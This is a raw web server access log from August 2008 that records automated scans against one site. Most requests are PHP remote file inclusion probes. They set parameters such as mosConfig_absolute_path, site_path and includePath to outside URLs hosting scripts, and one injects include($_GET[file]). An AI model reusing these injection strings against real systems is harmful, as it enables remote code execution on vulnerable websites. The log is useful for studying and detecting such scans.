212.227.83.110 - - [18/Aug/2008:12:14:07 -0700] "GET /chat.php?rg=0&test=http://www.italy-villa-rental.info/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.227.83.110 - - [18/Aug/2008:12:14:08 -0700] "GET /logs/chat.php?rg=0&test=http://www.italy-villa-rental.info/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.227.83.110 - - [18/Aug/2008:12:14:26 -0700] "GET /logs/access_080403.log/chat.php?rg=0&test=http://www.italy-villa-rental.info/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.227.83.110 - - [18/Aug/2008:12:14:29 -0700] "GET /logs/access_071225.log/global.php?abs_path=http://www.italy-villa-rental.info/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.227.83.110 - - [18/Aug/2008:12:14:29 -0700] "GET /global.php?abs_path=http://www.italy-villa-rental.info/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.227.83.110 - - [18/Aug/2008:12:14:30 -0700] "GET /logs/global.php?abs_path=http://www.italy-villa-rental.info/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.172.129.75 - - [18/Aug/2008:12:14:32 -0700] "GET /logs/access_080110.log/claroline/phpbb/page_tail.php?includePath=http://www.freexhost.info/users/gardhenal/Id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.172.129.75 - - [18/Aug/2008:12:14:32 -0700] "GET /claroline/phpbb/page_tail.php?includePath=http://www.freexhost.info/users/gardhenal/Id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.227.83.110 - - [18/Aug/2008:12:14:32 -0700] "GET /logs/global.php?abs_path=http://www.italy-villa-rental.info/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.172.129.75 - - [18/Aug/2008:12:14:32 -0700] "GET /logs/claroline/phpbb/page_tail.php?includePath=http://www.freexhost.info/users/gardhenal/Id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.227.83.110 - - [18/Aug/2008:12:14:32 -0700] "GET /global.php?abs_path=http://www.italy-villa-rental.info/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
69.72.218.250 - - [18/Aug/2008:12:14:35 -0700] "GET /logs/access_080630.log//include/admin.lib.inc.php?site_path=http://lnx.huddle.org/tb1tl33.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
201.80.26.155 - - [18/Aug/2008:12:14:39 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://adamari.net/img/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.18.5.72 - - [18/Aug/2008:12:14:41 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://lnx.huddle.org/tb1tl33.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
216.18.5.72 - - [18/Aug/2008:12:14:41 -0700] "GET /logs/access_080725.log//include/admin.lib.inc.php?site_path=http://lnx.huddle.org/tb1tl33.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
216.18.5.72 - - [18/Aug/2008:12:14:42 -0700] "GET //include/admin.lib.inc.php?site_path=http://lnx.huddle.org/tb1tl33.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
212.227.83.110 - - [18/Aug/2008:12:14:43 -0700] "GET /logs/access_080403.log/global.php?abs_path=http://www.italy-villa-rental.info/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.75.193.70 - - [18/Aug/2008:12:15:04 -0700] "GET /logs/access_080329.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.75.193.70 - - [18/Aug/2008:12:15:04 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.75.193.70 - - [18/Aug/2008:12:15:04 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.18.5.72 - - [18/Aug/2008:12:15:13 -0700] "GET /logs/access_080209.log/?sourcedir=http://lnx.huddle.org/tb1tl33.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
216.18.5.72 - - [18/Aug/2008:12:15:13 -0700] "GET /logs/?sourcedir=http://lnx.huddle.org/tb1tl33.txt??? HTTP/1.1" 200 61141 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
216.18.5.72 - - [18/Aug/2008:12:15:15 -0700] "GET /?sourcedir=http://lnx.huddle.org/tb1tl33.txt??? HTTP/1.1" 200 10947 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
216.18.5.72 - - [18/Aug/2008:12:15:18 -0700] "GET /logs/access_080809.log//include/admin.lib.inc.php?site_path=http://lnx.huddle.org/tb1tl33.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
69.72.218.250 - - [18/Aug/2008:12:15:24 -0700] "GET /?sourcedir=http://lnx.huddle.org/tb1tl33.txt??? HTTP/1.1" 200 10947 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
81.169.143.65 - - [18/Aug/2008:12:15:25 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.143.65 - - [18/Aug/2008:12:15:26 -0700] "GET //include/admin.lib.inc.php?site_path=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.75.193.70 - - [18/Aug/2008:12:15:31 -0700] "GET /logs/access_080218.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.185.237.191 - - [18/Aug/2008:12:15:35 -0700] "GET /logs/access_080415.log/errors.php?error=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.172.129.75 - - [18/Aug/2008:12:15:36 -0700] "GET /logs/access_080125.log/claroline/phpbb/page_tail.php?includePath=http://www.freexhost.info/users/gardhenal/Id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.169.143.65 - - [18/Aug/2008:12:15:43 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.143.65 - - [18/Aug/2008:12:15:44 -0700] "GET //include/admin.lib.inc.php?site_path=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.185.237.191 - - [18/Aug/2008:12:15:47 -0700] "GET /logs/access_080415.log/errors.php?error=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.131.127.13 - - [18/Aug/2008:12:16:07 -0700] "GET /logs/access_080725.log//include/admin.lib.inc.php?site_path=http://lnx.huddle.org/tb1tl33.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
216.131.127.13 - - [18/Aug/2008:12:16:07 -0700] "GET //include/admin.lib.inc.php?site_path=http://lnx.huddle.org/tb1tl33.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
216.131.127.13 - - [18/Aug/2008:12:16:07 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://lnx.huddle.org/tb1tl33.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
69.72.218.250 - - [18/Aug/2008:12:16:15 -0700] "GET /logs/access_080809.log//include/admin.lib.inc.php?site_path=http://lnx.huddle.org/tb1tl33.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
66.249.67.201 - - [18/Aug/2008:12:16:27 -0700] "GET /logs/access_080708.log HTTP/1.1" 200 3006074 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.67.201 - - [18/Aug/2008:12:16:27 -0700] "GET /logs/access_080713.log HTTP/1.1" 200 2593998 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
69.72.218.250 - - [18/Aug/2008:12:16:44 -0700] "GET /logs/access_080209.log/?sourcedir=http://lnx.huddle.org/tb1tl33.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
66.249.67.201 - - [18/Aug/2008:12:16:57 -0700] "GET /logs/access_080415.log HTTP/1.1" 200 1643190 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
211.233.19.218 - - [18/Aug/2008:12:17:44 -0700] "GET /logs/access_080615.log/?_SERVER[DOCUMENT_ROOT]=http://www.ezdesigns.net/geeklog/plugins/spamx/Mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.19.218 - - [18/Aug/2008:12:17:45 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.ezdesigns.net/geeklog/plugins/spamx/Mic22.txt??? HTTP/1.1" 200 11039 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.19.218 - - [18/Aug/2008:12:17:46 -0700] "GET /logs/access_080615.log/?_SERVER[DOCUMENT_ROOT]=http://www.ezdesigns.net/geeklog/plugins/spamx/Mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.19.218 - - [18/Aug/2008:12:17:47 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.ezdesigns.net/geeklog/plugins/spamx/Mic22.txt??? HTTP/1.0" 200 11023 "-" "Mozilla/5.0" "www.dmulk.com"
211.233.19.218 - - [18/Aug/2008:12:17:48 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.ezdesigns.net/geeklog/plugins/spamx/Mic22.txt??? HTTP/1.1" 200 11039 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.19.218 - - [18/Aug/2008:12:17:49 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://members.lycos.co.uk/capusha/spread.txt?? HTTP/1.1" 200 11003 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.19.218 - - [18/Aug/2008:12:17:49 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.ezdesigns.net/geeklog/plugins/spamx/Mic22.txt??? HTTP/1.0" 200 11023 "-" "Mozilla/5.0" "www.dmulk.com"
211.233.19.218 - - [18/Aug/2008:12:17:50 -0700] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.ezdesigns.net/geeklog/plugins/spamx/Mic22.txt??? HTTP/1.1" 200 61141 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.19.218 - - [18/Aug/2008:12:17:50 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://members.lycos.co.uk/capusha/spread.txt?? HTTP/1.1" 200 11003 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.19.218 - - [18/Aug/2008:12:17:50 -0700] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.ezdesigns.net/geeklog/plugins/spamx/Mic22.txt??? HTTP/1.1" 200 61141 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.19.218 - - [18/Aug/2008:12:17:51 -0700] "GET /logs/access_080713.log/?_SERVER[DOCUMENT_ROOT]=http://www.ezdesigns.net/geeklog/plugins/spamx/Mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.19.218 - - [18/Aug/2008:12:17:53 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.ezdesigns.net/geeklog/plugins/spamx/Mic22.txt??? HTTP/1.1" 200 11039 "-" "libwww-perl/5.65" "www.dmulk.com"
83.172.129.75 - - [18/Aug/2008:12:17:53 -0700] "GET /claroline/phpbb/page_tail.php?includePath=http://www.freexhost.info/users/gardhenal/Id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.19.218 - - [18/Aug/2008:12:17:53 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.ezdesigns.net/geeklog/plugins/spamx/Mic22.txt??? HTTP/1.0" 200 11023 "-" "Mozilla/5.0" "www.dmulk.com"
211.233.19.218 - - [18/Aug/2008:12:17:54 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://members.lycos.co.uk/capusha/spread.txt?? HTTP/1.1" 200 11003 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.19.218 - - [18/Aug/2008:12:17:54 -0700] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.ezdesigns.net/geeklog/plugins/spamx/Mic22.txt??? HTTP/1.1" 200 61141 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.19.218 - - [18/Aug/2008:12:18:08 -0700] "GET /logs/access_080708.log/?_SERVER[DOCUMENT_ROOT]=http://www.ezdesigns.net/geeklog/plugins/spamx/Mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:12:18:23 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:12:18:24 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:12:18:27 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:12:18:27 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.94.70.15 - - [18/Aug/2008:12:18:29 -0700] "GET /logs//?custompluginfile[]=http://warsector.ru/access2006.log??? HTTP/1.1" 200 61146 "-" "libwww-perl/5.65" "www.dmulk.com"
69.94.70.15 - - [18/Aug/2008:12:18:30 -0700] "GET //?custompluginfile[]=http://warsector.ru/access2006.log??? HTTP/1.1" 200 10978 "-" "libwww-perl/5.65" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:12:18:32 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:12:18:32 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:12:18:33 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:12:18:33 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.185.237.191 - - [18/Aug/2008:12:18:55 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.191 - - [18/Aug/2008:12:18:55 -0700] "GET //include/admin.lib.inc.php?site_path=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.191 - - [18/Aug/2008:12:18:57 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.191 - - [18/Aug/2008:12:18:58 -0700] "GET //include/admin.lib.inc.php?site_path=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.72.218.250 - - [18/Aug/2008:12:19:01 -0700] "GET /logs/?sourcedir=http://lnx.huddle.org/tb1tl33.txt??? HTTP/1.1" 200 61141 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:12:19:01 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.72.218.250 - - [18/Aug/2008:12:19:01 -0700] "GET /logs/access_080209.log/?sourcedir=http://lnx.huddle.org/tb1tl33.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:12:19:02 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:12:19:05 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:12:19:05 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.185.237.191 - - [18/Aug/2008:12:19:41 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.191 - - [18/Aug/2008:12:19:41 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
86.58.154.237 - - [18/Aug/2008:12:19:48 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.185.237.191 - - [18/Aug/2008:12:19:53 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.191 - - [18/Aug/2008:12:19:54 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.131.127.13 - - [18/Aug/2008:12:20:18 -0700] "GET /logs/access_080630.log//include/admin.lib.inc.php?site_path=http://lnx.huddle.org/tb1tl33.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
212.117.89.191 - - [18/Aug/2008:12:20:30 -0700] "GET /claroline/phpbb/page_tail.php?includePath=http://www.freexhost.info/users/gardhenal/Id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.135.41.76 - - [18/Aug/2008:12:20:49 -0700] "GET /logs/access_080808.log//bemarket/postscript/postscript.php?p_mode=http://esmakoken.com/valeandart/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.135.41.76 - - [18/Aug/2008:12:20:49 -0700] "GET //bemarket/postscript/postscript.php?p_mode=http://esmakoken.com/valeandart/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.135.41.76 - - [18/Aug/2008:12:20:50 -0700] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://esmakoken.com/valeandart/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.81.18 - - [18/Aug/2008:12:21:04 -0700] "GET /claroline/phpbb/page_tail.php?includePath=http://www.freexhost.info/users/gardhenal/Id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.69.246.191 - - [18/Aug/2008:12:21:13 -0700] "GET /logs/access_080808.log/phphtml.php?htmlclass_path=http://veldink.com/leqi/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.69.246.191 - - [18/Aug/2008:12:21:13 -0700] "GET /logs/phphtml.php?htmlclass_path=http://veldink.com/leqi/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.69.246.191 - - [18/Aug/2008:12:21:13 -0700] "GET /phphtml.php?htmlclass_path=http://veldink.com/leqi/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.130.79.130 - - [18/Aug/2008:12:21:16 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.130 - - [18/Aug/2008:12:21:16 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.130 - - [18/Aug/2008:12:21:18 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.130 - - [18/Aug/2008:12:21:18 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
75.69.246.191 - - [18/Aug/2008:12:21:20 -0700] "GET /logs/access_080809.log/phphtml.php?htmlclass_path=http://veldink.com/leqi/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.130.79.130 - - [18/Aug/2008:12:21:24 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.130 - - [18/Aug/2008:12:21:24 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.194.76.177 - - [18/Aug/2008:12:21:57 -0700] "GET //bemarket/postscript/postscript.php?p_mode=http://www.hatcon.com.sa/phpnuke/ultramode.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [18/Aug/2008:12:21:57 -0700] "GET /logs/access_080809.log%20//bemarket/postscript/postscript.php?p_mode=http://www.hatcon.com.sa/phpnuke/ultramode.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [18/Aug/2008:12:21:58 -0700] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.hatcon.com.sa/phpnuke/ultramode.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.18.5.72 - - [18/Aug/2008:12:22:08 -0700] "GET /logs/access_080630.log//include/admin.lib.inc.php?site_path=http://lnx.huddle.org/tb1tl33.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
216.131.127.13 - - [18/Aug/2008:12:22:13 -0700] "GET /logs/access_080630.log//include/admin.lib.inc.php?site_path=http://lnx.huddle.org/tb1tl33.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
201.130.79.130 - - [18/Aug/2008:12:22:17 -0700] "GET /logs/access_080803.log/errors.php?error=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
201.130.79.130 - - [18/Aug/2008:12:22:17 -0700] "GET /errors.php?error=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
201.130.79.130 - - [18/Aug/2008:12:22:18 -0700] "GET /logs/access_080803.log/errors.php?error=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
201.130.79.130 - - [18/Aug/2008:12:22:18 -0700] "GET /errors.php?error=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
66.135.41.76 - - [18/Aug/2008:12:22:29 -0700] "GET /logs/access_080809.log//bemarket/postscript/postscript.php?p_mode=http://esmakoken.com/valeandart/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.0.212.69 - - [18/Aug/2008:12:22:34 -0700] "GET /logs//errors.php?error=http://v3.siteframe.org/files/0002/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.0.212.69 - - [18/Aug/2008:12:22:35 -0700] "GET //errors.php?error=http://v3.siteframe.org/files/0002/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.131.127.13 - - [18/Aug/2008:12:22:40 -0700] "GET /?sourcedir=http://lnx.huddle.org/tb1tl33.txt??? HTTP/1.1" 200 10947 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
89.108.66.136 - - [18/Aug/2008:12:22:43 -0700] "GET /logs/?sourcedir=http://www.sibtorg.com/shop/usr/extensions/id1.txt?? HTTP/1.1" 200 61141 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.66.136 - - [18/Aug/2008:12:22:46 -0700] "GET /?sourcedir=http://www.sibtorg.com/shop/usr/extensions/id1.txt?? HTTP/1.1" 200 10987 "-" "libwww-perl/5.812" "www.dmulk.com"
